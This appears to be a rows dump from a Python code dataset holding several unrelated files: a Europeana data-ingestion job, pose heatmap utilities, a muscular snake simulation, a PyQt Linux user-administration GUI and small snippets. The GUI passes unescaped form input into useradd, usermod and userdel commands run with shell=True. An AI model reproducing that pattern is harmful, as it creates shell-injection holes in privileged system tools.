id
stringlengths 1
8
| text
stringlengths 6
1.05M
| dataset_id
stringclasses 1
value |
---|---|---|
3396468
|
# Copyright 2021 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0
import inspect
import logging
import os
import pandas as pd
import requests
from vdk.api.job_input import IJobInput
log = logging.getLogger(__name__)
def run(job_input: IJobInput):
"""
Download datasets required by the scenario and put them in the data lake.
"""
log.info(f"Starting job step {__name__}")
api_key = job_input.get_property("api_key")
start = 1
rows = 100
basic_url = f"https://api.europeana.eu/record/v2/search.json?wskey={api_key}&query=who:%22Vincent%20Van%20Gogh%22"
url = f"{basic_url}&rows={rows}&start={start}"
response = requests.get(url)
response.raise_for_status()
payload = response.json()
n_items = int(payload["totalResults"])
while start < n_items:
if start > n_items - rows:
rows = n_items - start + 1
url = f"{basic_url}&rows={rows}&start={start}"
response = requests.get(url)
response.raise_for_status()
payload = response.json()["items"]
df = pd.DataFrame(payload)
job_input.send_tabular_data_for_ingestion(
df.itertuples(index=False),
destination_table="assets",
column_names=df.columns.tolist(),
)
start = start + rows
# df = pd.read_csv(url, dtype=dtypes).replace("'", "''", regex=True)
# df.columns = df.columns.str.replace(" ", "")
# job_input.send_tabular_data_for_ingestion(
# df.itertuples(index=False),
# destination_table="life_expectancy_2010_2015",
# column_names=df.columns.tolist(),
# )
|
StarcoderdataPython
|
3254592
|
"""Sk-learn module."""
from deployml.sklearn.models.decision_tree import DecisionTree
from deployml.sklearn.models.logistic_regression import LogisticRegressionBase
from deployml.sklearn.models.neural_network import NeuralNetworkBase
|
StarcoderdataPython
|
3496632
|
<filename>VA/main/utils/heatmaps.py<gh_stars>100-1000
import numpy as np
from .math import normalpdf2d
from .pose import get_visible_joints
class HeatMaps2D():
def __init__(self, poses, numbins, variance=0.3):
assert (poses.shape[-1] == 2) or ((poses.shape[-1] == 3)), \
'Poses are expected to by 2D or 3D!'
self.poses = poses
if len(poses.shape) == 4:
self.num_frames = poses.shape[1]
else:
self.num_frames = None
self.numbins = numbins
self.variance = variance
self.num_joints = int(poses.shape[-2])
def __getitem__(self, key):
p = self.poses[key]
if isinstance(key, int):
return pose_heatmaps(p, self.numbins, self.num_joints,
variance=self.variance, num_frames=self.num_frames)
if isinstance(key, slice):
indices = key.indices(len(self))
key = range(*indices)
x = np.zeros((len(key),) + self.shape[1:])
for i in range(len(key)):
x[i,:] = pose_heatmaps(p[i], self.numbins, self.num_joints,
variance=self.variance, num_frames=self.num_frames)
return x
def __len__(self):
return len(self.poses)
@property
def shape(self):
if self.num_frames is None:
return (len(self),) + (self.numbins, self.numbins, self.num_joints)
else:
return (len(self),) + (self.num_frames,
self.numbins, self.numbins, self.num_joints)
def pose_heatmaps(p, num_bins, num_joints, variance=0.1, num_frames=None):
if num_frames is None:
h = np.zeros((num_bins, num_bins, num_joints))
v = get_visible_joints(p[:, 0:2])
points = num_bins * p[:, 0:2]
for j in range(num_joints):
if v[j]:
h[:,:,j] = normalpdf2d(num_bins,
points[j,0], points[j,1], variance)
else:
h = np.zeros((num_frames, num_bins, num_bins, num_joints))
for f in range(num_frames):
v = get_visible_joints(p[f][:, 0:2])
points = num_bins * p[f][:, 0:2]
for j in range(num_joints):
if v[j]:
h[f,:,:,j] = normalpdf2d(num_bins,
points[j,0], points[j,1], variance)
return h
|
StarcoderdataPython
|
12823434
|
__doc__ = """Muscular snake example from <NAME>. al. Nature Comm 2019 paper."""
import sys
import numpy as np
sys.path.append("../../")
from elastica import *
from examples.MuscularSnake.post_processing import (
plot_video_with_surface,
plot_snake_velocity,
)
from examples.MuscularSnake.muscle_forces import MuscleForces
from elastica.experimental.connection_contact_joint.parallel_connection import (
SurfaceJointSideBySide,
get_connection_vector_straight_straight_rod,
)
# Set base simulator class
class MuscularSnakeSimulator(
BaseSystemCollection, Constraints, Connections, Forcing, CallBacks
):
pass
muscular_snake_simulator = MuscularSnakeSimulator()
# Simulation parameters
final_time = 16.0
time_step = 5e-6
total_steps = int(final_time / time_step)
rendering_fps = 30
step_skip = int(1.0 / (rendering_fps * time_step))
rod_list = []
# Snake body
n_elem_body = 100
density_body = 1000
base_length_body = 1.0
base_radius_body = 0.025
E = 1e7
nu = 4e-3
shear_modulus = E / 2 * (0.5 + 1.0)
poisson_ratio = 0.5
direction = np.array([1.0, 0.0, 0.0])
normal = np.array([0.0, 0.0, 1.0])
start = np.array([0.0, 0.0, base_radius_body])
snake_body = CosseratRod.straight_rod(
n_elem_body,
start,
direction,
normal,
base_length_body,
base_radius_body,
density_body,
nu,
youngs_modulus=E,
shear_modulus=shear_modulus,
)
body_elem_length = snake_body.rest_lengths[0]
# Define muscle fibers
n_muscle_fibers = 8
# Muscle force amplitudes
muscle_force_amplitudes = (
np.array([22.96, 22.96, 20.95, 20.95, 9.51, 9.51, 13.7, 13.7])[::-1] / 2
)
# Set connection index of first node of each muscle with body
muscle_start_connection_index = [4, 4, 33, 33, 23, 23, 61, 61]
muscle_end_connection_index = []
muscle_glue_connection_index = (
[]
) # These are the middle node idx of muscles that are glued to body
muscle_rod_list = []
"""
The muscle density is higher than the physiological one, since
we lump many muscles (SSP-SP, LD and IC) into one actuator. These rods
also represent the two tendons on the sides of the muscle which biologically
have a higher density than the muscle itself. For these reasons,we set the
muscle density to approximately twice the biological value.
"""
density_muscle = 2000
E_muscle = 1e4
nu_muscle = nu
shear_modulus_muscle = E_muscle / 2 * (0.5 + 1.0)
# Muscle group 1 and 3, define two antagonistic muscle pairs
n_elem_muscle_group_one_to_three = 13 * 3
base_length_muscle = 0.39
"""
In our simulation, we lump many biological tendons into one computational
tendon. As a result, our computational tendon is bigger in size, set as elements other than 4-8
below.
"""
muscle_radius = np.zeros((n_elem_muscle_group_one_to_three))
muscle_radius[:] = 0.003 # First set tendon radius for whole rod.
muscle_radius[4 * 3 : 9 * 3] = 0.006 # Change the radius of muscle elements
for i in range(int(n_muscle_fibers / 2)):
index = muscle_start_connection_index[i]
# Chose which side of body we are attaching the muscles. Note that these muscles are antagonistic pairs.
# So they are at the opposite sides of the body and side_sign determines that.
side_sign = -1 if i % 2 == 0 else 1
start_muscle = np.array(
[
index * body_elem_length,
side_sign * (base_radius_body + 0.003),
base_radius_body,
]
)
muscle_rod = CosseratRod.straight_rod(
n_elem_muscle_group_one_to_three,
start_muscle,
direction,
normal,
base_length_muscle,
muscle_radius,
density_muscle,
nu_muscle,
youngs_modulus=E_muscle,
shear_modulus=shear_modulus_muscle,
)
"""
The biological tendons have a high Young's modulus E.,but are very slender.
As a result, they resist extension (stretch) but can bend easily.
Due to our decision to lump tendons and in order to mimic the above behavior
of the biological tendons, we use a lower Young's
Modulus and harden the stiffness of the shear and stretch modes only.
Numerically, this is done by putting a pre-factor of 50000 before the
shear/stretch matrix below. The actual value of the prefactor does not matter,
what is important is that it is a high value to high stretch/shear stiffness.
"""
muscle_rod.shear_matrix[..., : 4 * 3] *= 50000
muscle_rod.shear_matrix[..., 9 * 3 :] *= 50000
muscle_rod_list.append(muscle_rod)
muscle_end_connection_index.append(index + n_elem_muscle_group_one_to_three)
muscle_glue_connection_index.append(
np.hstack(
(
np.arange(0, 4 * 3, 1, dtype=np.int64),
np.arange(9 * 3, n_elem_muscle_group_one_to_three, 1, dtype=np.int64),
)
)
)
# Muscle group 2 and 4, define two antagonistic muscle pairs
n_elem_muscle_group_two_to_four = 33
base_length_muscle = 0.33
"""
In our simulation, we lump many biological tendons into one computational
tendon. As a result, our computational tendon is bigger in size, set as rm_t
below.
"""
muscle_radius = np.zeros((n_elem_muscle_group_two_to_four))
muscle_radius[:] = 0.003 # First set tendon radius for whole rod.
muscle_radius[4 * 3 : 9 * 3] = 0.006 # Change the radius of muscle elements
for i in range(int(n_muscle_fibers / 2), n_muscle_fibers):
index = muscle_start_connection_index[i]
# Chose which side of body we are attaching the muscles. Note that these muscles are antagonistic pairs.
# So they are at the opposite sides of the body and side_sign determines that.
side_sign = -1 if i % 2 == 0 else 1
start_muscle = np.array(
[
index * body_elem_length,
side_sign * (base_radius_body + 0.003),
base_radius_body,
]
)
muscle_rod = CosseratRod.straight_rod(
n_elem_muscle_group_two_to_four,
start_muscle,
direction,
normal,
base_length_muscle,
muscle_radius,
density_muscle,
nu_muscle,
youngs_modulus=E_muscle,
shear_modulus=shear_modulus_muscle,
)
"""
The biological tendons have a high Young's modulus E.,but are very slender.
As a result, they resist extension (stretch) but can bend easily.
Due to our decision to lump tendons and in order to mimic the above behavior
of the biological tendons, we use a lower Young's
Modulus and harden the stiffness of the shear and stretch modes only.
Numerically, this is done by putting a pre-factor of 50000 before the
shear/stretch matrix below. The actual value of the prefactor does not matter,
what is important is that it is a high value to high stretch/shear stiffness.
"""
muscle_rod.shear_matrix[..., : 4 * 3] *= 50000
muscle_rod.shear_matrix[..., 9 * 3 :] *= 50000
muscle_rod_list.append(muscle_rod)
muscle_end_connection_index.append(index + n_elem_muscle_group_two_to_four)
muscle_glue_connection_index.append(
# np.array([0,1, 2, 3, 9, 10 ], dtype=np.int)
np.hstack(
(
np.arange(0, 4 * 3, 1, dtype=np.int64),
np.arange(9 * 3, n_elem_muscle_group_two_to_four, 1, dtype=np.int64),
)
)
)
# After initializing the rods append them on to the simulation
rod_list.append(snake_body)
rod_list = rod_list + muscle_rod_list
for _, my_rod in enumerate(rod_list):
muscular_snake_simulator.append(my_rod)
# Muscle actuation
post_processing_forces_dict_list = []
for i in range(n_muscle_fibers):
post_processing_forces_dict_list.append(defaultdict(list))
muscle_rod = muscle_rod_list[i]
side_of_body = 1 if i % 2 == 0 else -1
time_delay = muscle_start_connection_index[::-1][i] * 1.0 / 101.76
muscular_snake_simulator.add_forcing_to(muscle_rod).using(
MuscleForces,
amplitude=muscle_force_amplitudes[i],
wave_number=2.0 * np.pi / 1.0,
arm_length=(base_radius_body + 0.003),
time_delay=time_delay,
side_of_body=side_of_body,
muscle_start_end_index=np.array([4 * 3, 9 * 3], np.int64),
step=step_skip,
post_processing=post_processing_forces_dict_list[i],
)
straight_straight_rod_connection_list = []
straight_straight_rod_connection_post_processing_dict = defaultdict(list)
for idx, rod_two in enumerate(muscle_rod_list):
rod_one = snake_body
(
rod_one_direction_vec_in_material_frame,
rod_two_direction_vec_in_material_frame,
offset_btw_rods,
) = get_connection_vector_straight_straight_rod(
rod_one,
rod_two,
(muscle_start_connection_index[idx], muscle_end_connection_index[idx]),
(0, rod_two.n_elems),
)
straight_straight_rod_connection_list.append(
[
rod_one,
rod_two,
rod_one_direction_vec_in_material_frame.copy(),
rod_two_direction_vec_in_material_frame.copy(),
offset_btw_rods.copy(),
]
)
for k in range(rod_two.n_elems):
rod_one_index = k + muscle_start_connection_index[idx]
rod_two_index = k
k_conn = (
rod_one.radius[rod_one_index]
* rod_two.radius[rod_two_index]
/ (rod_one.radius[rod_one_index] + rod_two.radius[rod_two_index])
* body_elem_length
* E
/ (rod_one.radius[rod_one_index] + rod_two.radius[rod_two_index])
)
if k < 12 or k >= 27:
scale = 1 * 2
scale_contact = 20
else:
scale = 0.01 * 5
scale_contact = 20
muscular_snake_simulator.connect(
first_rod=rod_one,
second_rod=rod_two,
first_connect_idx=rod_one_index,
second_connect_idx=rod_two_index,
).using(
SurfaceJointSideBySide,
k=k_conn * scale,
nu=1e-4,
k_repulsive=k_conn * scale_contact,
rod_one_direction_vec_in_material_frame=rod_one_direction_vec_in_material_frame[
..., k
],
rod_two_direction_vec_in_material_frame=rod_two_direction_vec_in_material_frame[
..., k
],
offset_btw_rods=offset_btw_rods[k],
post_processing_dict=straight_straight_rod_connection_post_processing_dict,
step_skip=step_skip,
)
# Friction forces
# Only apply to the snake body.
gravitational_acc = -9.81
muscular_snake_simulator.add_forcing_to(snake_body).using(
GravityForces, acc_gravity=np.array([0.0, 0.0, gravitational_acc])
)
origin_plane = np.array([0.0, 0.0, 0.0])
normal_plane = normal
slip_velocity_tol = 1e-8
froude = 0.1
period = 1.0
mu = base_length_body / (period * period * np.abs(gravitational_acc) * froude)
kinetic_mu_array = np.array(
[1.0 * mu, 1.5 * mu, 2.0 * mu]
) # [forward, backward, sideways]
static_mu_array = 2 * kinetic_mu_array
muscular_snake_simulator.add_forcing_to(snake_body).using(
AnisotropicFrictionalPlane,
k=1e1,
nu=40,
plane_origin=origin_plane,
plane_normal=normal_plane,
slip_velocity_tol=slip_velocity_tol,
static_mu_array=static_mu_array,
kinetic_mu_array=kinetic_mu_array,
)
class MuscularSnakeCallBack(CallBackBaseClass):
def __init__(self, step_skip: int, callback_params: dict):
CallBackBaseClass.__init__(self)
self.every = step_skip
self.callback_params = callback_params
def make_callback(self, system, time, current_step: int):
if current_step % self.every == 0:
self.callback_params["time"].append(time)
self.callback_params["step"].append(current_step)
self.callback_params["position"].append(system.position_collection.copy())
self.callback_params["com"].append(system.compute_position_center_of_mass())
self.callback_params["radius"].append(system.radius.copy())
self.callback_params["velocity"].append(system.velocity_collection.copy())
self.callback_params["avg_velocity"].append(
system.compute_velocity_center_of_mass()
)
self.callback_params["center_of_mass"].append(
system.compute_position_center_of_mass()
)
post_processing_dict_list = []
for idx, rod in enumerate(rod_list):
post_processing_dict_list.append(defaultdict(list))
muscular_snake_simulator.collect_diagnostics(rod).using(
MuscularSnakeCallBack,
step_skip=step_skip,
callback_params=post_processing_dict_list[idx],
)
muscular_snake_simulator.finalize()
timestepper = PositionVerlet()
integrate(timestepper, muscular_snake_simulator, final_time, total_steps)
plot_video_with_surface(
post_processing_dict_list,
video_name="muscular_snake.mp4",
fps=rendering_fps,
step=1,
# The following parameters are optional
x_limits=(-0.1, 1.0), # Set bounds on x-axis
y_limits=(-0.3, 0.3), # Set bounds on y-axis
z_limits=(-0.3, 0.3), # Set bounds on z-axis
dpi=100, # Set the quality of the image
vis3D=True, # Turn on 3D visualization
vis2D=True, # Turn on projected (2D) visualization
)
plot_snake_velocity(
post_processing_dict_list[0], period=period, filename="muscular_snake_velocity.png"
)
|
StarcoderdataPython
|
86376
|
<reponame>flyflyinit/GUI-admin-tool
from PyQt5.QtCore import Qt
try:
from PyQt5.QtWidgets import QWidget, QVBoxLayout, QProgressBar, QPushButton, QSpinBox, QLabel, QLineEdit, \
QFormLayout, \
QHBoxLayout, QListWidget, QMessageBox, QCheckBox
except ImportError as e:
print(
f'package PyQt5 Not Found\n{e}\ntry :\npip3 install --user pyqt5\nOR\ndnf install python3-pyqt5, yum install python3-pyqt5\n')
try:
import subprocess
import concurrent.futures
from datetime import datetime
except ImportError as e:
print(f'package not found\n{e}\n')
class CreateUsersWindow(QWidget):
def __init__(self):
super().__init__()
self.setGeometry(200, 50, 300, 400)
self.setWindowTitle("Add Users")
self.layouts()
self.widgets()
def layouts(self):
self.mainLayout = QVBoxLayout()
self.topLayout = QVBoxLayout()
self.topLayout.setContentsMargins(20, 20, 20, 20)
self.bottomLayout = QHBoxLayout()
self.progeesBar = QProgressBar()
self.progeesBar.setHidden(True)
self.okBtn = QPushButton("Ok")
self.okBtn.clicked.connect(self.cancelAction)
self.okBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px solid #27ae60")
self.okBtn.setHidden(True)
self.submitBtn = QPushButton("Submit")
self.submitBtn.clicked.connect(self.submitAction)
self.cancelBtn = QPushButton("Cancel")
self.cancelBtn.clicked.connect(self.cancelAction)
self.submitBtn.setHidden(False)
self.cancelBtn.setHidden(False)
self.okBtn.setFixedHeight(30)
self.submitBtn.setFixedHeight(30)
self.cancelBtn.setFixedHeight(30)
self.submitBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px solid #27ae60")
self.cancelBtn.setStyleSheet("color: #ecf0f1; background-color: #e74c3c; border: 0px solid #e74c3c")
self.bottomLayout.addWidget(self.okBtn)
self.bottomLayout.addWidget(self.submitBtn)
self.bottomLayout.addWidget(self.cancelBtn)
self.mainLayout.addLayout(self.topLayout)
self.mainLayout.addStretch()
self.mainLayout.addWidget(self.progeesBar)
self.mainLayout.addLayout(self.bottomLayout)
self.setLayout(self.mainLayout)
def widgets(self):
self.usersNbr = QSpinBox(self)
self.usersNbr.setMinimum(1)
self.usersNbr.setMaximum(1000)
self.usersNbr.setSuffix(" user")
self.createHomeDir = QCheckBox('Create Home Directory')
self.form = QFormLayout()
self.editLineUsername = QLineEdit('')
self.editLineUsername.setPlaceholderText('enter username')
self.form.addRow(QLabel('Username :'), self.editLineUsername)
self.editLineUserShell = QLineEdit('')
self.editLineUserShell.setPlaceholderText('enter shell')
self.form.addRow(QLabel('User Shell :'), self.editLineUserShell)
self.editLineUserComment = QLineEdit('')
self.editLineUserComment.setPlaceholderText('enter comment')
self.form.addRow(QLabel('Comment :'), self.editLineUserComment)
self.note = QLabel('')
self.topLayout.addWidget(self.usersNbr)
self.topLayout.addWidget(self.editLineUsername)
self.topLayout.addWidget(self.editLineUserShell)
self.topLayout.addWidget(self.editLineUserComment)
self.topLayout.addWidget(self.createHomeDir)
self.topLayout.addWidget(self.note)
def submitAction(self):
self.setCursor(Qt.WaitCursor)
self.progeesBar.setHidden(False)
self.progeesBar.setMaximum(self.usersNbr.value())
self.progeesBar.setValue(0)
usersList = self.generateList()
txt = ''
nbr = 0
with concurrent.futures.ThreadPoolExecutor() as executor:
results = executor.map(self.createuserThreading, usersList)
for result in results:
nbr += 1
self.progeesBar.setValue(nbr)
txt = txt + result + "\n"
self.note.setText(txt)
self.setCursor(Qt.ArrowCursor)
self.okBtn.setHidden(False)
self.submitBtn.setHidden(True)
self.cancelBtn.setHidden(True)
def generateList(self):
usersList = []
homeDir = 'False'
if self.createHomeDir.isChecked():
homeDir = 'True'
if int(self.usersNbr.value()) == 1:
usersList.append(
[self.editLineUsername.text(), self.editLineUserComment.text(), self.editLineUserShell.text(), homeDir])
else:
for user in range(self.usersNbr.value()):
usersList.append(
[self.editLineUsername.text() + str(user + 1), self.editLineUserComment.text() + str(user + 1),
self.editLineUserShell.text(), homeDir])
return usersList
def createuserThreading(self, user):
if user[3] == 'True':
homedir = '-m'
else:
homedir = ''
try:
c = f'useradd {homedir} -s {user[2]} -c "{user[1]}" {user[0]}'
subprocess.run(c, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True, check=True)
except subprocess.CalledProcessError:
return f"error occured during creating {user[0]} "
else:
return f"{user[0]} has been created succesfully!"
def cancelAction(self):
self.close()
class EditUsersWindow(QWidget):
def __init__(self, userDetails):
super().__init__()
self.setGeometry(200, 50, 500, 500)
self.setWindowTitle("Edit User")
self.userDetails = userDetails
self.layouts()
self.widgets()
def layouts(self):
self.mainLayout = QVBoxLayout()
self.topLayout = QVBoxLayout()
self.middleLayout = QHBoxLayout()
self.topLayout.setContentsMargins(20, 20, 20, 20)
self.bottomLayout = QHBoxLayout()
self.text = QLabel('')
self.progeesBar = QProgressBar()
self.progeesBar.setHidden(True)
self.submitBtn = QPushButton("Submit")
self.submitBtn.clicked.connect(self.submitAction)
self.cancelBtn = QPushButton("Cancel")
self.cancelBtn.clicked.connect(self.cancelAction)
self.okBtn = QPushButton("Ok")
self.okBtn.clicked.connect(self.okAction)
self.okBtn.setHidden(True)
self.submitBtn.setFixedHeight(30)
self.cancelBtn.setFixedHeight(30)
self.okBtn.setFixedHeight(30)
self.submitBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px")
self.okBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px")
self.cancelBtn.setStyleSheet("color: #ecf0f1; background-color: #e74c3c; border: 0px")
self.bottomLayout.addWidget(self.submitBtn)
self.bottomLayout.addWidget(self.cancelBtn)
self.bottomLayout.addWidget(self.okBtn)
self.mainLayout.addLayout(self.topLayout)
self.mainLayout.addStretch()
self.mainLayout.addLayout(self.bottomLayout)
self.setLayout(self.mainLayout)
def widgets(self):
self.form = QFormLayout()
print(self.userDetails)
self.username = QLineEdit(self.userDetails[0])
self.form.addRow(QLabel('Username :'), self.username)
self.id = QLineEdit(self.userDetails[1])
self.form.addRow(QLabel('User ID :'), self.id)
self.primaryGroup = self.userDetails[2].split('(')[1].split(')')[0]
self.priGroup = QLineEdit(self.primaryGroup)
self.form.addRow(QLabel('Primary Group :'), self.priGroup)
self.comment = QLineEdit(self.userDetails[4])
self.form.addRow(QLabel('Comment :'), self.comment)
self.homeDir = QLineEdit(self.userDetails[5])
self.form.addRow(QLabel('Home Directory :'), self.homeDir)
self.shell = QLineEdit(self.userDetails[6])
self.form.addRow(QLabel('Shell :'), self.shell)
if self.userDetails[7] == 'never':
self.expirationDate = QLineEdit()
else:
import dateutil.parser as parser
self.expirationDate_adapted = datetime.strptime(self.userDetails[7], '%b %d, %Y').strftime('%Y-%m-%d')
date = parser.parse(self.expirationDate_adapted)
self.expirationDate = QLineEdit(date.isoformat().split('T')[0])
self.form.addRow(QLabel('Expiration Date :'), self.expirationDate)
self.groupsBtns = QVBoxLayout()
self.lineEditAddGroup = QLineEdit()
self.lineEditAddGroup.setPlaceholderText('enter group name')
self.addGroupBtn = QPushButton('Add')
self.addGroupBtn.clicked.connect(self.addGroup)
self.deleteGroupBtn = QPushButton('Delete')
self.deleteGroupBtn.clicked.connect(self.deleteGroup)
self.deleteAllGroupsBtn = QPushButton('Delete All')
self.deleteAllGroupsBtn.clicked.connect(self.deleteAllGroups)
self.groupsBtns.addWidget(self.lineEditAddGroup)
self.groupsBtns.addWidget(self.addGroupBtn)
self.groupsBtns.addWidget(self.deleteGroupBtn)
self.groupsBtns.addWidget(self.deleteAllGroupsBtn)
self.groupsBtns.addStretch()
self.listGroups = QListWidget()
self.form.addRow(QLabel('Groups :'), self.middleLayout)
groups = self.userDetails[3].split(',')
for group in groups:
grp = group.split('(')[1].split(')')[0]
if grp == self.primaryGroup:
continue
else:
self.listGroups.addItem(grp)
self.middleLayout.addWidget(self.listGroups)
self.middleLayout.addLayout(self.groupsBtns)
self.topLayout.addLayout(self.form)
self.topLayout.addWidget(self.text)
self.topLayout.addWidget(self.progeesBar)
def addGroup(self):
group = self.lineEditAddGroup.text()
if group == "":
pass
else:
self.listGroups.addItem(group)
def deleteGroup(self):
listGroups = self.listGroups.selectedItems()
if not listGroups: return
for group in listGroups:
self.listGroups.takeItem(self.listGroups.row(group))
def deleteAllGroups(self):
self.listGroups.clear()
def submitAction(self):
try:
self.setCursor(Qt.WaitCursor)
self.progeesBar.setHidden(False)
self.progeesBar.setMaximum(1)
self.progeesBar.setValue(0)
self.edituser()
except subprocess.CalledProcessError:
QMessageBox.warning(self, 'warning', f"error occured during editing this user\n")
else:
self.setCursor(Qt.ArrowCursor)
self.submitBtn.setHidden(True)
self.cancelBtn.setHidden(True)
self.okBtn.setHidden(False)
def okAction(self):
self.close()
def edituser(self):
usernamee = self.username.text()
idd = self.id.text()
priGroupp = self.priGroup.text()
commentt = self.comment.text()
homeDirr = self.homeDir.text()
shelll = self.shell.text()
expirationDatee = self.expirationDate.text()
txt = ''
groupsitems = []
for index in range(self.listGroups.count()):
groupsitems.append(str(self.listGroups.item(index).text()))
groupsitemsstring = ",".join(groupsitems)
print(groupsitemsstring)
if expirationDatee == "never":
QMessageBox.warning(self, 'expiration field error', "expiration field can't be 'never' ")
return 0
elif expirationDatee == '':
pass
else:
try:
subprocess.run(f'usermod -e {expirationDatee} {self.userDetails[0]}', stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing expiration date for this user\n"
self.text.setText(txt)
else:
txt = txt + "expiration date edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f'usermod -g {priGroupp} {self.userDetails[0]}', stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing primary group for this user\n"
self.text.setText(txt)
else:
txt = txt + "primary group edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f'usermod -G {groupsitemsstring} {self.userDetails[0]}', stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing supplementary groups for this user\n"
self.text.setText(txt)
else:
txt = txt + "supplementary groups edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f'usermod -s {shelll} {self.userDetails[0]}', stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing shell for this user\n"
self.text.setText(txt)
else:
txt = txt + "shell edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f'usermod -d {homeDirr} {self.userDetails[0]}', stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing home directory for this user\n"
self.text.setText(txt)
else:
txt = txt + "home directory edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f"usermod -c '{commentt}' {self.userDetails[0]}", stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing comment for this user\n"
self.text.setText(txt)
else:
txt = txt + "comment edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f"usermod -u {idd} {self.userDetails[0]}", stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing user id for this user\n"
self.text.setText(txt)
else:
txt = txt + "user id edited succesfully\n"
self.text.setText(txt)
try:
subprocess.run(f'usermod -l {usernamee} {self.userDetails[0]}', stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL, check=True, shell=True)
except subprocess.CalledProcessError:
txt = txt + "error occured during editing username for this user\n"
self.text.setText(txt)
else:
txt = txt + "username edited succesfully\n"
self.text.setText(txt)
self.progeesBar.setValue(1)
def cancelAction(self):
self.close()
class DeleteUsersWindow(QWidget):
def __init__(self, d):
super().__init__()
self.setGeometry(200, 50, 300, 300)
self.setWindowTitle("Delete Users")
self.listUsersToDelete = d
self.layouts()
self.widgets()
def layouts(self):
self.mainLayout = QVBoxLayout()
self.topLayout = QVBoxLayout()
self.topLayout.setContentsMargins(20, 20, 20, 20)
self.bottomLayout = QHBoxLayout()
self.progeesBar = QProgressBar()
self.progeesBar.setHidden(True)
self.submitBtn = QPushButton("Submit")
self.submitBtn.clicked.connect(self.submitAction)
self.cancelBtn = QPushButton("Cancel")
self.cancelBtn.clicked.connect(self.cancelAction)
self.okBtn = QPushButton("Ok")
self.okBtn.clicked.connect(self.okAction)
self.okBtn.setHidden(True)
self.submitBtn.setFixedHeight(30)
self.cancelBtn.setFixedHeight(30)
self.okBtn.setFixedHeight(30)
self.submitBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px")
self.okBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px")
self.cancelBtn.setStyleSheet("color: #ecf0f1; background-color: #e74c3c; border: 0px")
self.bottomLayout.addWidget(self.submitBtn)
self.bottomLayout.addWidget(self.cancelBtn)
self.bottomLayout.addWidget(self.okBtn)
self.mainLayout.addLayout(self.topLayout)
self.mainLayout.addStretch()
self.mainLayout.addLayout(self.bottomLayout)
self.setLayout(self.mainLayout)
def widgets(self):
self.a = ', '.join(self.listUsersToDelete)
self.text = QLabel(f'Are You Sure You want To Delete The Following Users :\n\n{self.a}')
self.text2 = QLabel()
self.topLayout.addWidget(self.text)
self.topLayout.addWidget(self.text2)
self.topLayout.addWidget(self.progeesBar)
def submitAction(self):
try:
self.setCursor(Qt.WaitCursor)
self.progeesBar.setHidden(False)
self.progeesBar.setMaximum(len(self.listUsersToDelete))
self.progeesBar.setValue(0)
self.deleteuser()
except subprocess.CalledProcessError:
QMessageBox.warning(self, 'warning', f"error occured during setting this hostname\n")
else:
self.setCursor(Qt.ArrowCursor)
self.submitBtn.setHidden(True)
self.cancelBtn.setHidden(True)
self.okBtn.setHidden(False)
def okAction(self):
self.close()
def deleteuserThreading(self, username):
try:
subprocess.run(f'userdel -r {username}', stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True,
shell=True)
except subprocess.CalledProcessError:
return f"error occured during deleting {username}"
else:
return f"{username} deleted succesfully!"
def deleteuser(self):
with concurrent.futures.ThreadPoolExecutor() as executor:
results = executor.map(self.deleteuserThreading, self.listUsersToDelete)
i = 0
r = ''
for result in results:
i = i + 1
r = r + "\n" + result
self.progeesBar.setValue(i)
self.text2.setText(r)
def cancelAction(self):
self.close()
class MoreUsersWindow(QWidget):
def __init__(self, text, username):
super().__init__()
self.setGeometry(200, 50, 300, 300)
self.setWindowTitle(username)
self.text = text
self.layouts()
def layouts(self):
self.mainLayout = QVBoxLayout()
self.topLayout = QVBoxLayout()
self.topLayout.setContentsMargins(20, 20, 20, 20)
self.bottomLayout = QHBoxLayout()
self.label = QLabel(self.text)
self.okBtn = QPushButton("Ok")
self.okBtn.clicked.connect(self.okAction)
self.okBtn.setFixedHeight(30)
self.okBtn.setStyleSheet("color: #ecf0f1; background-color: #27ae60 ; border: 0px")
self.topLayout.addWidget(self.label)
self.bottomLayout.addWidget(self.okBtn)
self.mainLayout.addLayout(self.topLayout)
self.mainLayout.addStretch()
self.mainLayout.addLayout(self.bottomLayout)
self.setLayout(self.mainLayout)
def okAction(self):
self.close()
|
StarcoderdataPython
|
360238
|
<reponame>varun97/Python<filename>minimax.py
def minimax(arr):
arr.sort()
max = 0
min = 0
for i in range(len(arr)):
if i!=0:
max += arr[i]
if i!=4:
min += arr[i]
print(min,max)
if __name__=="__main__":
arr = list(map(int, input().rstrip().split()))
minimax(arr)
|
StarcoderdataPython
|
4803881
|
"""
Implementation of the beta-geometric/NBD (BG/NBD) model from '"Counting Your train_df" the Easy Way: An Alternative to
